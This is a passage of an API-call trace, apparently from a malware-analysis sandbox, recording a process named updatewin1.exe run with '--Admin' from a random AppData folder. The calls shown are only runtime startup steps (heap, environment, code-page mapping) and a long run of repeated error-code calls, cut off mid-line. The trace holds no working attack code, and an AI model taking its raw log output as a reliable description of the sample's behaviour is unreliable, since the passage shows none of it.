lpReserved2=0x0, hStdInput=0xffffffff, hStdOutput=0xffffffff, hStdError=0xffffffff)) [0113.745] RtlAllocateHeap (HeapHandle=0x260000, Flags=0x8, Size=0x800) returned 0x2609f0 [0113.745] GetStdHandle (nStdHandle=0xfffffff6) returned 0x0 [0113.745] GetStdHandle (nStdHandle=0xfffffff5) returned 0x0 [0113.745] GetStdHandle (nStdHandle=0xfffffff4) returned 0x0 [0113.745] SetHandleCount (uNumber=0x20) returned 0x20 [0113.745] GetCommandLineA () returned="\"C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Local\\1eed4f4c-ee3f-42d5-9fd1-74f531bda6b5\\updatewin1.exe\" --Admin" [0113.745] GetEnvironmentStringsW () returned 0x5f4e78* [0113.745] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x0, lpWideCharStr="ALLUSERSPROFILE=C:\\ProgramData", cchWideChar=1381, lpMultiByteStr=0x0, cbMultiByte=0, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr=0x0, lpUsedDefaultChar=0x0) returned 1381 [0113.745] RtlAllocateHeap (HeapHandle=0x260000, Flags=0x0, Size=0x565) returned 0x2611f8 [0113.745] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x0, lpWideCharStr="ALLUSERSPROFILE=C:\\ProgramData", cchWideChar=1381, lpMultiByteStr=0x2611f8, cbMultiByte=1381, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="ALLUSERSPROFILE=C:\\ProgramData", lpUsedDefaultChar=0x0) returned 1381 [0113.745] FreeEnvironmentStringsW (penv=0x5f4e78) returned 1 [0113.745] GetLastError () returned 0x0 [0113.745] SetLastError (dwErrCode=0x0) [0113.745] GetLastError () returned 0x0 [0113.746] SetLastError (dwErrCode=0x0) [0113.746] GetLastError () returned 0x0 [0113.746] SetLastError (dwErrCode=0x0) [0113.746] GetACP () returned 0x4e4 [0113.746] RtlAllocateHeap (HeapHandle=0x260000, Flags=0x0, Size=0x220) returned 0x261768 [0113.746] GetLastError () returned 0x0 [0113.746] SetLastError (dwErrCode=0x0) [0113.746] IsValidCodePage (CodePage=0x4e4) returned 1 [0113.746] GetCPInfo (in: CodePage=0x4e4, lpCPInfo=0x18fe84 | out: lpCPInfo=0x18fe84) returned 1 [0113.746] GetCPInfo (in: CodePage=0x4e4, lpCPInfo=0x18f950 | out: lpCPInfo=0x18f950) returned 1 [0113.746] GetLastError () returned 0x0 [0113.746] SetLastError (dwErrCode=0x0) [0113.746] GetStringTypeW (in: dwInfoType=0x1, lpSrcStr="", cchSrc=1, lpCharType=0x18f8e0 | out: lpCharType=0x18f8e0) returned 1 [0113.746] MultiByteToWideChar (in: CodePage=0x4e4, dwFlags=0x1, lpMultiByteStr=0x18fd64, cbMultiByte=256, lpWideCharStr=0x0, cchWideChar=0 | out: lpWideCharStr=0x0) returned 256 [0113.746] MultiByteToWideChar (in: CodePage=0x4e4, dwFlags=0x1, lpMultiByteStr=0x18fd64, cbMultiByte=256, lpWideCharStr=0x18f6c8, cchWideChar=256 | out: lpWideCharStr=" \x01\x02\x03\x04\x05\x06\x07\x08\x09\n\x0b\x0c\r\x0e\x0f\x10\x11\x12\x13\x14\x15\x16\x17\x18\x19\x1a\x1b\x1c\x1d\x1e\x1f !\"#$%&'()*+,-./0123456789:;<=>?@ABCDEFGHIJKLMNOPQRSTUVWXYZ[\\]^_`abcdefghijklmnopqrstuvwxyz{|}~\x7f€\x81‚ƒ„…†‡ˆ‰Š‹Œ\x8dŽ\x8f\x90‘’“”•–—˜™š›œ\x9džŸ ¡¢£¤¥¦§¨©ª«¬­®¯°±²³´µ¶·¸¹º»¼½¾¿ÀÁÂÃÄÅÆÇÈÉÊËÌÍÎÏÐÑÒÓÔÕÖ×ØÙÚÛÜÝÞßàáâãäåæçèéêëìíîïðñòóôõö÷øùúûüýþÿĀ") returned 256 [0113.746] GetStringTypeW (in: dwInfoType=0x1, lpSrcStr=" \x01\x02\x03\x04\x05\x06\x07\x08\x09\n\x0b\x0c\r\x0e\x0f\x10\x11\x12\x13\x14\x15\x16\x17\x18\x19\x1a\x1b\x1c\x1d\x1e\x1f !\"#$%&'()*+,-./0123456789:;<=>?@ABCDEFGHIJKLMNOPQRSTUVWXYZ[\\]^_`abcdefghijklmnopqrstuvwxyz{|}~\x7f€\x81‚ƒ„…†‡ˆ‰Š‹Œ\x8dŽ\x8f\x90‘’“”•–—˜™š›œ\x9džŸ ¡¢£¤¥¦§¨©ª«¬­®¯°±²³´µ¶·¸¹º»¼½¾¿ÀÁÂÃÄÅÆÇÈÉÊËÌÍÎÏÐÑÒÓÔÕÖ×ØÙÚÛÜÝÞßàáâãäåæçèéêëìíîïðñòóôõö÷øùúûüýþÿĀ", cchSrc=256, lpCharType=0x18f964 | out: lpCharType=0x18f964) returned 1 [0113.746] GetLastError () returned 0x0 [0113.746] SetLastError (dwErrCode=0x0) [0113.746] LCMapStringW (in: Locale=0x0, dwMapFlags=0x100, lpSrcStr="", cchSrc=1, lpDestStr=0x0, cchDest=0 | out: lpDestStr=0x0) returned 1 [0113.746] MultiByteToWideChar (in: CodePage=0x4e4, dwFlags=0x1, lpMultiByteStr=0x18fd64, cbMultiByte=256, lpWideCharStr=0x0, cchWideChar=0 | out: lpWideCharStr=0x0) returned 256 [0113.746] MultiByteToWideChar (in: CodePage=0x4e4, dwFlags=0x1, lpMultiByteStr=0x18fd64, cbMultiByte=256, lpWideCharStr=0x18f698, cchWideChar=256 | out: lpWideCharStr=" \x01\x02\x03\x04\x05\x06\x07\x08\x09\n\x0b\x0c\r\x0e\x0f\x10\x11\x12\x13\x14\x15\x16\x17\x18\x19\x1a\x1b\x1c\x1d\x1e\x1f !\"#$%&'()*+,-./0123456789:;<=>?@ABCDEFGHIJKLMNOPQRSTUVWXYZ[\\]^_`abcdefghijklmnopqrstuvwxyz{|}~\x7f€\x81‚ƒ„…†‡ˆ‰Š‹Œ\x8dŽ\x8f\x90‘’“”•–—˜™š›œ\x9džŸ ¡¢£¤¥¦§¨©ª«¬­®¯°±²³´µ¶·¸¹º»¼½¾¿ÀÁÂÃÄÅÆÇÈÉÊËÌÍÎÏÐÑÒÓÔÕÖ×ØÙÚÛÜÝÞßàáâãäåæçèéêëìíîïðñòóôõö÷øùúûüýþÿ㰄濶㞕AĀ") returned 256 [0113.746] LCMapStringW (in: Locale=0x0, dwMapFlags=0x100, lpSrcStr=" \x01\x02\x03\x04\x05\x06\x07\x08\x09\n\x0b\x0c\r\x0e\x0f\x10\x11\x12\x13\x14\x15\x16\x17\x18\x19\x1a\x1b\x1c\x1d\x1e\x1f !\"#$%&'()*+,-./0123456789:;<=>?@ABCDEFGHIJKLMNOPQRSTUVWXYZ[\\]^_`abcdefghijklmnopqrstuvwxyz{|}~\x7f€\x81‚ƒ„…†‡ˆ‰Š‹Œ\x8dŽ\x8f\x90‘’“”•–—˜™š›œ\x9džŸ ¡¢£¤¥¦§¨©ª«¬­®¯°±²³´µ¶·¸¹º»¼½¾¿ÀÁÂÃÄÅÆÇÈÉÊËÌÍÎÏÐÑÒÓÔÕÖ×ØÙÚÛÜÝÞßàáâãäåæçèéêëìíîïðñòóôõö÷øùúûüýþÿ㰄濶㞕AĀ", cchSrc=256, lpDestStr=0x0, cchDest=0 | out: lpDestStr=0x0) returned 256 [0113.746] LCMapStringW (in: Locale=0x0, dwMapFlags=0x100, lpSrcStr=" \x01\x02\x03\x04\x05\x06\x07\x08\x09\n\x0b\x0c\r\x0e\x0f\x10\x11\x12\x13\x14\x15\x16\x17\x18\x19\x1a\x1b\x1c\x1d\x1e\x1f !\"#$%&'()*+,-./0123456789:;<=>?@ABCDEFGHIJKLMNOPQRSTUVWXYZ[\\]^_`abcdefghijklmnopqrstuvwxyz{|}~\x7f€\x81‚ƒ„…†‡ˆ‰Š‹Œ\x8dŽ\x8f\x90‘’“”•–—˜™š›œ\x9džŸ ¡¢£¤¥¦§¨©ª«¬­®¯°±²³´µ¶·¸¹º»¼½¾¿ÀÁÂÃÄÅÆÇÈÉÊËÌÍÎÏÐÑÒÓÔÕÖ×ØÙÚÛÜÝÞßàáâãäåæçèéêëìíîïðñòóôõö÷øùúûüýþÿ㰄濶㞕AĀ", cchSrc=256, lpDestStr=0x18f488, cchDest=256 | out: lpDestStr=" \x01\x02\x03\x04\x05\x06\x07\x08\x09\n\x0b\x0c\r\x0e\x0f\x10\x11\x12\x13\x14\x15\x16\x17\x18\x19\x1a\x1b\x1c\x1d\x1e\x1f !\"#$%&'()*+,-./0123456789:;<=>?@abcdefghijklmnopqrstuvwxyz[\\]^_`abcdefghijklmnopqrstuvwxyz{|}~\x7f€\x81‚ƒ„…†‡ˆ‰š‹œ\x8dž\x8f\x90‘’“”•–—˜™š›œ\x9džÿ ¡¢£¤¥¦§¨©ª«¬­®¯°±²³´µ¶·¸¹º»¼½¾¿àáâãäåæçèéêëìíîïðñòóôõö×øùúûüýþßàáâãäåæçèéêëìíîïðñòóôõö÷øùúûüýþÿĀ") returned 256 [0113.747] WideCharToMultiByte (in: CodePage=0x4e4, dwFlags=0x0, lpWideCharStr=" \x01\x02\x03\x04\x05\x06\x07\x08\x09\n\x0b\x0c\r\x0e\x0f\x10\x11\x12\x13\x14\x15\x16\x17\x18\x19\x1a\x1b\x1c\x1d\x1e\x1f !\"#$%&'()*+,-./0123456789:;<=>?@abcdefghijklmnopqrstuvwxyz[\\]^_`abcdefghijklmnopqrstuvwxyz{|}~\x7f€\x81‚ƒ„…†‡ˆ‰š‹œ\x8dž\x8f\x90‘’“”•–—˜™š›œ\x9džÿ ¡¢£¤¥¦§¨©ª«¬­®¯°±²³´µ¶·¸¹º»¼½¾¿àáâãäåæçèéêëìíîïðñòóôõö×øùúûüýþßàáâãäåæçèéêëìíîïðñòóôõö÷øùúûüýþÿĀ", cchWideChar=256, lpMultiByteStr=0x18fc64, cbMultiByte=256, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr=" \x01\x02\x03\x04\x05\x06\x07\x08\x09\n\x0b\x0c\r\x0e\x0f\x10\x11\x12\x13\x14\x15\x16\x17\x18\x19\x1a\x1b\x1c\x1d\x1e\x1f !\"#$%&'()*+,-./0123456789:;<=>?@abcdefghijklmnopqrstuvwxyz[\\]^_`abcdefghijklmnopqrstuvwxyz{|}~\x7f\x80\x81\x82\x83\x84…\x86\x87\x88\x89\x9a\x8b\x9c\x8d\x9e\x8f\x90\x91\x92\x93\x94\x95\x96\x97\x98\x99\x9a\x9b\x9c\x9d\x9eÿ ¡¢£¤¥¦§¨©ª«¬­®¯°±²³´µ¶·¸¹º»¼½¾¿àáâãäåæçèéêëìíîïðñòóôõö×øùúûüýþßàáâãäåæçèéêëìíîïðñòóôõö÷øùúûüýþÿ \x01\x02\x03\x04\x05\x06\x07\x08\x09\n\x0b\x0c\r\x0e\x0f\x10\x11\x12\x13\x14\x15\x16\x17\x18\x19\x1a\x1b\x1c\x1d\x1e\x1f !\"#$%&'()*+,-./0123456789:;<=>?@ABCDEFGHIJKLMNOPQRSTUVWXYZ[\\]^_`abcdefghijklmnopqrstuvwxyz{|}~\x7f\x80\x81\x82\x83\x84…\x86\x87\x88\x89\x8a\x8b\x8c\x8d\x8e\x8f\x90\x91\x92\x93\x94\x95\x96\x97\x98\x99\x9a\x9b\x9c\x9d\x9e\x9f ¡¢£¤¥¦§¨©ª«¬­®¯°±²³´µ¶·¸¹º»¼½¾¿ÀÁÂÃÄÅÆÇÈÉÊËÌÍÎÏÐÑÒÓÔÕÖ×ØÙÚÛÜÝÞßàáâãäåæçèéêëìíîïðñòóôõö÷øùúûüýþÿ\x84}\x9fm\x9cþ\x18", lpUsedDefaultChar=0x0) returned 256 [0113.747] GetLastError () returned 0x0 [0113.747] SetLastError (dwErrCode=0x0) [0113.747] MultiByteToWideChar (in: CodePage=0x4e4, dwFlags=0x1, lpMultiByteStr=0x18fd64, cbMultiByte=256, lpWideCharStr=0x0, cchWideChar=0 | out: lpWideCharStr=0x0) returned 256 [0113.747] MultiByteToWideChar (in: CodePage=0x4e4, dwFlags=0x1, lpMultiByteStr=0x18fd64, cbMultiByte=256, lpWideCharStr=0x18f6b8, cchWideChar=256 | out: lpWideCharStr=" \x01\x02\x03\x04\x05\x06\x07\x08\x09\n\x0b\x0c\r\x0e\x0f\x10\x11\x12\x13\x14\x15\x16\x17\x18\x19\x1a\x1b\x1c\x1d\x1e\x1f !\"#$%&'()*+,-./0123456789:;<=>?@ABCDEFGHIJKLMNOPQRSTUVWXYZ[\\]^_`abcdefghijklmnopqrstuvwxyz{|}~\x7f€\x81‚ƒ„…†‡ˆ‰Š‹Œ\x8dŽ\x8f\x90‘’“”•–—˜™š›œ\x9džŸ ¡¢£¤¥¦§¨©ª«¬­®¯°±²³´µ¶·¸¹º»¼½¾¿ÀÁÂÃÄÅÆÇÈÉÊËÌÍÎÏÐÑÒÓÔÕÖ×ØÙÚÛÜÝÞßàáâãäåæçèéêëìíîïðñòóôõö÷øùúûüýþÿ㰄濶㞕AĀ") returned 256 [0113.747] LCMapStringW (in: Locale=0x0, dwMapFlags=0x200, lpSrcStr=" \x01\x02\x03\x04\x05\x06\x07\x08\x09\n\x0b\x0c\r\x0e\x0f\x10\x11\x12\x13\x14\x15\x16\x17\x18\x19\x1a\x1b\x1c\x1d\x1e\x1f !\"#$%&'()*+,-./0123456789:;<=>?@ABCDEFGHIJKLMNOPQRSTUVWXYZ[\\]^_`abcdefghijklmnopqrstuvwxyz{|}~\x7f€\x81‚ƒ„…†‡ˆ‰Š‹Œ\x8dŽ\x8f\x90‘’“”•–—˜™š›œ\x9džŸ ¡¢£¤¥¦§¨©ª«¬­®¯°±²³´µ¶·¸¹º»¼½¾¿ÀÁÂÃÄÅÆÇÈÉÊËÌÍÎÏÐÑÒÓÔÕÖ×ØÙÚÛÜÝÞßàáâãäåæçèéêëìíîïðñòóôõö÷øùúûüýþÿ㰄濶㞕AĀ", cchSrc=256, lpDestStr=0x0, cchDest=0 | out: lpDestStr=0x0) returned 256 [0113.747] LCMapStringW (in: Locale=0x0, dwMapFlags=0x200, lpSrcStr=" \x01\x02\x03\x04\x05\x06\x07\x08\x09\n\x0b\x0c\r\x0e\x0f\x10\x11\x12\x13\x14\x15\x16\x17\x18\x19\x1a\x1b\x1c\x1d\x1e\x1f !\"#$%&'()*+,-./0123456789:;<=>?@ABCDEFGHIJKLMNOPQRSTUVWXYZ[\\]^_`abcdefghijklmnopqrstuvwxyz{|}~\x7f€\x81‚ƒ„…†‡ˆ‰Š‹Œ\x8dŽ\x8f\x90‘’“”•–—˜™š›œ\x9džŸ ¡¢£¤¥¦§¨©ª«¬­®¯°±²³´µ¶·¸¹º»¼½¾¿ÀÁÂÃÄÅÆÇÈÉÊËÌÍÎÏÐÑÒÓÔÕÖ×ØÙÚÛÜÝÞßàáâãäåæçèéêëìíîïðñòóôõö÷øùúûüýþÿ㰄濶㞕AĀ", cchSrc=256, lpDestStr=0x18f4a8, cchDest=256 | out: lpDestStr=" \x01\x02\x03\x04\x05\x06\x07\x08\x09\n\x0b\x0c\r\x0e\x0f\x10\x11\x12\x13\x14\x15\x16\x17\x18\x19\x1a\x1b\x1c\x1d\x1e\x1f !\"#$%&'()*+,-./0123456789:;<=>?@ABCDEFGHIJKLMNOPQRSTUVWXYZ[\\]^_`ABCDEFGHIJKLMNOPQRSTUVWXYZ{|}~\x7f€\x81‚Ƒ„…†‡ˆ‰Š‹Œ\x8dŽ\x8f\x90‘’“”•–—˜™Š›Œ\x9dŽŸ ¡¢£¤¥¦§¨©ª«¬­®¯°±²³´µ¶·¸¹º»¼½¾¿ÀÁÂÃÄÅÆÇÈÉÊËÌÍÎÏÐÑÒÓÔÕÖ×ØÙÚÛÜÝÞßÀÁÂÃÄÅÆÇÈÉÊËÌÍÎÏÐÑÒÓÔÕÖ÷ØÙÚÛÜÝÞŸĀ") returned 256 [0113.747] WideCharToMultiByte (in: CodePage=0x4e4, dwFlags=0x0, lpWideCharStr=" \x01\x02\x03\x04\x05\x06\x07\x08\x09\n\x0b\x0c\r\x0e\x0f\x10\x11\x12\x13\x14\x15\x16\x17\x18\x19\x1a\x1b\x1c\x1d\x1e\x1f !\"#$%&'()*+,-./0123456789:;<=>?@ABCDEFGHIJKLMNOPQRSTUVWXYZ[\\]^_`ABCDEFGHIJKLMNOPQRSTUVWXYZ{|}~\x7f€\x81‚Ƒ„…†‡ˆ‰Š‹Œ\x8dŽ\x8f\x90‘’“”•–—˜™Š›Œ\x9dŽŸ ¡¢£¤¥¦§¨©ª«¬­®¯°±²³´µ¶·¸¹º»¼½¾¿ÀÁÂÃÄÅÆÇÈÉÊËÌÍÎÏÐÑÒÓÔÕÖ×ØÙÚÛÜÝÞßÀÁÂÃÄÅÆÇÈÉÊËÌÍÎÏÐÑÒÓÔÕÖ÷ØÙÚÛÜÝÞŸĀ", cchWideChar=256, lpMultiByteStr=0x18fb64, cbMultiByte=256, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr=" \x01\x02\x03\x04\x05\x06\x07\x08\x09\n\x0b\x0c\r\x0e\x0f\x10\x11\x12\x13\x14\x15\x16\x17\x18\x19\x1a\x1b\x1c\x1d\x1e\x1f !\"#$%&'()*+,-./0123456789:;<=>?@ABCDEFGHIJKLMNOPQRSTUVWXYZ[\\]^_`ABCDEFGHIJKLMNOPQRSTUVWXYZ{|}~\x7f\x80\x81\x82\x83\x84…\x86\x87\x88\x89\x8a\x8b\x8c\x8d\x8e\x8f\x90\x91\x92\x93\x94\x95\x96\x97\x98\x99\x8a\x9b\x8c\x9d\x8e\x9f ¡¢£¤¥¦§¨©ª«¬­®¯°±²³´µ¶·¸¹º»¼½¾¿ÀÁÂÃÄÅÆÇÈÉÊËÌÍÎÏÐÑÒÓÔÕÖ×ØÙÚÛÜÝÞßÀÁÂÃÄÅÆÇÈÉÊËÌÍÎÏÐÑÒÓÔÕÖ÷ØÙÚÛÜÝÞ\x9f \x01\x02\x03\x04\x05\x06\x07\x08\x09\n\x0b\x0c\r\x0e\x0f\x10\x11\x12\x13\x14\x15\x16\x17\x18\x19\x1a\x1b\x1c\x1d\x1e\x1f !\"#$%&'()*+,-./0123456789:;<=>?@abcdefghijklmnopqrstuvwxyz[\\]^_`abcdefghijklmnopqrstuvwxyz{|}~\x7f\x80\x81\x82\x83\x84…\x86\x87\x88\x89\x9a\x8b\x9c\x8d\x9e\x8f\x90\x91\x92\x93\x94\x95\x96\x97\x98\x99\x9a\x9b\x9c\x9d\x9eÿ ¡¢£¤¥¦§¨©ª«¬­®¯°±²³´µ¶·¸¹º»¼½¾¿àáâãäåæçèéêëìíîïðñòóôõö×øùúûüýþßàáâãäåæçèéêëìíîïðñòóôõö÷øùúûüýþÿ \x01\x02\x03\x04\x05\x06\x07\x08\x09\n\x0b\x0c\r\x0e\x0f\x10\x11\x12\x13\x14\x15\x16\x17\x18\x19\x1a\x1b\x1c\x1d\x1e\x1f !\"#$%&'()*+,-./0123456789:;<=>?@ABCDEFGHIJKLMNOPQRSTUVWXYZ[\\]^_`abcdefghijklmnopqrstuvwxyz{|}~\x7f\x80\x81\x82\x83\x84…\x86\x87\x88\x89\x8a\x8b\x8c\x8d\x8e\x8f\x90\x91\x92\x93\x94\x95\x96\x97\x98\x99\x9a\x9b\x9c\x9d\x9e\x9f ¡¢£¤¥¦§¨©ª«¬­®¯°±²³´µ¶·¸¹º»¼½¾¿ÀÁÂÃÄÅÆÇÈÉÊËÌÍÎÏÐÑÒÓÔÕÖ×ØÙÚÛÜÝÞßàáâãäåæçèéêëìíîïðñòóôõö÷øùúûüýþÿ\x84}\x9fm\x9cþ\x18", lpUsedDefaultChar=0x0) returned 256 [0113.747] GetModuleFileNameA (in: hModule=0x0, lpFilename=0x43a580, nSize=0x104 | out: lpFilename="C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Local\\1eed4f4c-ee3f-42d5-9fd1-74f531bda6b5\\updatewin1.exe" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\appdata\\local\\1eed4f4c-ee3f-42d5-9fd1-74f531bda6b5\\updatewin1.exe")) returned 0x5f [0113.747] GetLastError () returned 0x0 [0113.747] SetLastError (dwErrCode=0x0) [0113.747] GetLastError () returned 0x0 [0113.747] SetLastError (dwErrCode=0x0) [0113.747] GetLastError () returned 0x0 [0113.747] SetLastError (dwErrCode=0x0) [0113.747] GetLastError () returned 0x0 [0113.747] SetLastError (dwErrCode=0x0) [0113.747] GetLastError () returned 0x0 [0113.747] SetLastError (dwErrCode=0x0) [0113.747] GetLastError () returned 0x0 [0113.747] SetLastError (dwErrCode=0x0) [0113.747] GetLastError () returned 0x0 [0113.748] SetLastError (dwErrCode=0x0) [0113.748] GetLastError () returned 0x0 [0113.748] SetLastError (dwErrCode=0x0) [0113.748] GetLastError () returned 0x0 [0113.748] SetLastError (dwErrCode=0x0) [0113.748] GetLastError () returned 0x0 [0113.748] SetLastError (dwErrCode=0x0) [0113.748] GetLastError () returned 0x0 [0113.748] SetLastError (dwErrCode=0x0) [0113.748] GetLastError () returned 0x0 [0113.748] SetLastError (dwErrCode=0x0) [0113.748] GetLastError () returned 0x0 [0113.748] SetLastError (dwErrCode=0x0) [0113.748] GetLastError () returned 0x0 [0113.748] SetLastError (dwErrCode=0x0) [0113.748] GetLastError () returned 0x0 [0113.748] SetLastError (dwErrCode=0x0) [0113.748] GetLastError () returned 0x0 [0113.748] SetLastError (dwErrCode=0x0) [0113.748] GetLastError () returned 0x0 [0113.748] SetLastError (dwErrCode=0x0) [0113.748] GetLastError () returned 0x0 [0113.748] SetLastError (dwErrCode=0x0) [0113.748] GetLastError () returned 0x0 [0113.748] SetLastError (dwErrCode=0x0) [0113.749] GetLastError () returned 0x0 [0113.749] SetLastError (dwErrCode=0x0) [0113.749] GetLastError () returned 0x0 [0113.749] SetLastError (dwErrCode=0x0) [0113.749] GetLastError () returned 0x0 [0113.749] SetLastError (dwErrCode=0x0) [0113.749] GetLastError () returned 0x0 [0113.749] SetLastError (dwErrCode=0x0) [0113.749] GetLastError () returned 0x0 [0113.749] SetLastError (dwErrCode=0x0) [0113.749] GetLastError () returned 0x0 [0113.749] SetLastError (dwErrCode=0x0) [0113.749] GetLastError () returned 0x0 [0113.749] SetLastError (dwErrCode=0x0) [0113.749] GetLastError () returned 0x0 [0113.749] SetLastError (dwErrCode=0x0) [0113.749] GetLastError () returned 0x0 [0113.749] SetLastError (dwErrCode=0x0) [0113.749] GetLastError () returned 0x0 [0113.749] SetLastError (dwErrCode=0x0) [0113.749] GetLastError () returned 0x0 [0113.749] SetLastError (dwErrCode=0x0) [0113.749] GetLastError () returned 0x0 [0113.750] SetLastError (dwErrCode=0x0) [0113.750] GetLastError () returned 0x0 [0113.750] SetLastError (dwErrCode=0x0) [0113.750] GetLastError () returned 0x0 [0113.750] SetLastError (dwErrCode=0x0) [0113.750] GetLastError () returned 0x0 [0113.750] SetLastError (dwErrCode=0x0) [0113.750] GetLastError () returned 0x0 [0113.750] SetLastError (dwErrCode=0x0) [0113.750] GetLastError () returned 0x0 [0113.750] SetLastError (dwErrCode=0x0) [0113.750] GetLastError () returned 0x0 [0113.750] SetLastError (dwErrCode=0x0) [0113.750] GetLastError () returned 0x0 [0113.750] SetLastError (dwErrCode=0x0) [0113.750] GetLastError () returned 0x0 [0113.750] SetLastError (dwErrCode=0x0) [0113.750] GetLastError () returned 0x0 [0113.750] SetLastError (dwErrCode=0x0) [0113.750] GetLastError () returned 0x0 [0113.751] SetLastError (dwErrCode=0x0) [0113.751] GetLastError () returned 0x0 [0113.751] SetLastError (dwErrCode=0x0) [0113.751] GetLastError () returned 0x0 [0113.751] SetLastError (dwErrCode=0x0) [0113.751] GetLastError () returned 0x0 [0113.751] SetLastError (dwErrCode=0x0) [0113.751] GetLastError () returned 0x0 [0113.751] SetLastError (dwErrCode=0x0) [0113.751] GetLastError () returned 0x0 [0113.751] SetLastError (dwErrCode=0x0) [0113.751] GetLastError () returned 0x0 [0113.751] SetLastError (dwErrCode=0x0) [0113.751] GetLastError () returned 0x0 [0113.751] SetLastError (dwErrCode=0x0) [0113.751] GetLastError () returned 0x0 [0113.751] SetLastError (dwErrCode=0x0) [0113.751] GetLastError () returned 0x0 [0113.751] SetLastError (dwErrCode=0x0) [0113.751] GetLastError () returned 0x0 [0113.752] SetLastError (dwErrCode=0x0) [0113.752] GetLastError () returned 0x0 [0113.752] SetLastError (dwErrCode=0x0) [0113.752] GetLastError () returned 0x0 [0113.752] SetLastError (dwErrCode=0x0) [0113.752] GetLastError () returned 0x0 [0113.752] SetLastError (dwErrCode=0x0) [0113.752] GetLastError () returned 0x0 [0113.752] SetLastError (dwErrCode=0x0) [0113.752] GetLastError () returned 0x0 [0113.752] SetLastError (dwErrCode=0x0) [0113.752] GetLastError () returned 0x0 [0113.752] SetLastError (dwErrCode=0x0) [0113.752] GetLastError () returned 0x0 [0113.752] SetLastError (dwErrCode=0x0) [0113.752] GetLastError () returned 0x0 [0113.752] SetLastError (dwErrCode=0x0) [0113.752] GetLastError () returned 0x0 [0113.752] SetLastError (dwErrCode=0x0) [0113.752] GetLastError () returned 0x0 [0113.753] SetLastError (dwErrCode=0x0) [0113.753] GetLastError () returned 0x0 [0113.753] SetLastError (dwErrCode=0x0) [0113.753] GetLastError () returned 0x0 [0113.753] SetLastError (dwErrCode=0x0) [0113.753] GetLastError () returned 0x0 [0113.753] SetLastError (dwErrCode=0x0) [0113.753] GetLastError () returned 0x0 [0113.753] SetLastError (dwErrCode=0x0) [0113.753] GetLastError () returned 0x0 [0113.753] SetLastError (dwErrCode=0x0) [0113.753] GetLastError () returned 0x0 [0113.753] SetLastError (dwErrCode=0x0) [0113.753] GetLastError () returned 0x0 [0113.753] SetLastError (dwErrCode=0x0) [0113.753] GetLastError () returned 0x0 [0113.753] SetLastError (dwErrCode=0x0) [0113.753] GetLastError () returned 0x0 [0113.753] SetLastError (dwErrCode=0x0) [0113.753] GetLastError () returned 0x0 [0113.753] SetLastError (dwErrCode=0x0) [0113.753] GetLastError () returned 0x0 [0113.753] SetLastError (dwErrCode=0x0) [0113.753] GetLastError () returned 0x0 [0113.753] SetLastError (dwErrCode=0x0) [0113.754] GetLastError () returned 0x0 [0113.754] SetLastError (dwErrCode=0x0) [0113.754] GetLastError () returned 0x0 [0113.754] SetLastError (dwErrCode=0x0) [0113.754] GetLastError () returned 0x0 [0113.754] SetLastError (dwErrCode=0x0) [0113.754] GetLastError () returned 0x0 [0113.754] SetLastError (dwErrCode=0x0) [0113.754] GetLastError () returned 0x0 [0113.754] SetLastError (dwErrCode=0x0) [0113.754] GetLastError () returned 0x0 [0113.754] SetLastError (dwErrCode=0x0) [0113.754] GetLastError () returned 0x0 [0113.754] SetLastError (dwErrCode=0x0) [0113.754] GetLastError () returned 0x0 [0113.754] SetLastError (dwErrCode=0x0) [0113.754] GetLastError () returned 0x0 [0113.754] SetLastError (dwErrCode=0x0) [0113.754] GetLastError () returned 0x0 [0113.754] SetLastError (dwErrCode=0x0) [0113.754] GetLastError () returned 0x0 [0113.754] SetLastError (dwErrCode=0x0) [0113.754] GetLastError () returned 0x0 [0113.755] SetLastError (dwErrCode=0x0) [0113.755] GetLastError () returned 0x0 [0113.755] SetLastError (dwErrCode=0x0) [0113.755] GetLastError () returned 0x0 [0113.755] SetLastError (dwErrCode=0x0) [0113.755] GetLastError () returned 0x0 [0113.755] SetLastError (dwErrCode=0x0) [0113.755] GetLastError () returned 0x0 [0113.755] SetLastError (dwErrCode=0x0) [0113.755] GetLastError () returned 0x0 [0113.755] SetLastError (dwErrCode=0x0) [0113.755] GetLastError () returned 0x0 [0113.755] SetLastError (dwErrCode=0x0) [0113.755] GetLastError () returned 0x0 [0113.755] SetLastError (dwErrCode=0x0) [0113.755] GetLastError () returned 0x0 [0113.755] SetLastError (dwErrCode=0x0) [0113.755] GetLastError () returned 0x0 [0113.755] SetLastError (dwErrCode=0x0) [0113.755] GetLastError () returned 0x0 [0113.755] SetLastError (dwErrCode=0x0) [0113.756] GetLastError () returned 0x0 [0113.756] SetLastError (dwErrCode=0x0) [0113.756] GetLastError () returned 0x0 [0113.756] SetLastError (dwErrCode=0x0) [0113.756] GetLastError () returned 0x0 [0113.756] SetLastError (dwErrCode=0x0) [0113.756] GetLastError () returned 0x0 [0113.756] SetLastError (dwErrCode=0x0) [0113.756] GetLastError () returned 0x0 [0113.756] SetLastError (dwErrCode=0x0) [0113.756] GetLastError () returned 0x0 [0113.756] SetLastError (dwErrCode=0x0) [0113.756] GetLastError () returned 0x0 [0113.756] SetLastError (dwErrCode=0x0) [0113.756] GetLastError () returned 0x0 [0113.756] SetLastError (dwErrCode=0x0) [0113.756] RtlAllocateHeap (HeapHandle=0x260000, Flags=0x0, Size=0x74) returned 0x261990 [0113.756] GetLastError () returned 0x0 [0113.756] SetLastError (dwErrCode=0x0) [0113.756] GetLastError () returned 0x0 [0113.757] SetLastError (dwErrCode=0x0) [0113.757] GetLastError () returned 0x0 [0113.757] SetLastError (dwErrCode=0x0) [0113.757] GetLastError () returned 0x0 [0113.757] SetLastError (dwErrCode=0x0) [0113.757] GetLastError () returned 0x0 [0113.757] SetLastError (dwErrCode=0x0) [0113.757] GetLastError () returned 0x0 [0113.757] SetLastError (dwErrCode=0x0) [0113.757] GetLastError () returned 0x0 [0113.757] SetLastError (dwErrCode=0x0) [0113.757] GetLastError () returned 0x0 [0113.757] SetLastError (dwErrCode=0x0) [0113.757] GetLastError () returned 0x0 [0113.757] SetLastError (dwErrCode=0x0) [0113.757] GetLastError () returned 0x0 [0113.757] SetLastError 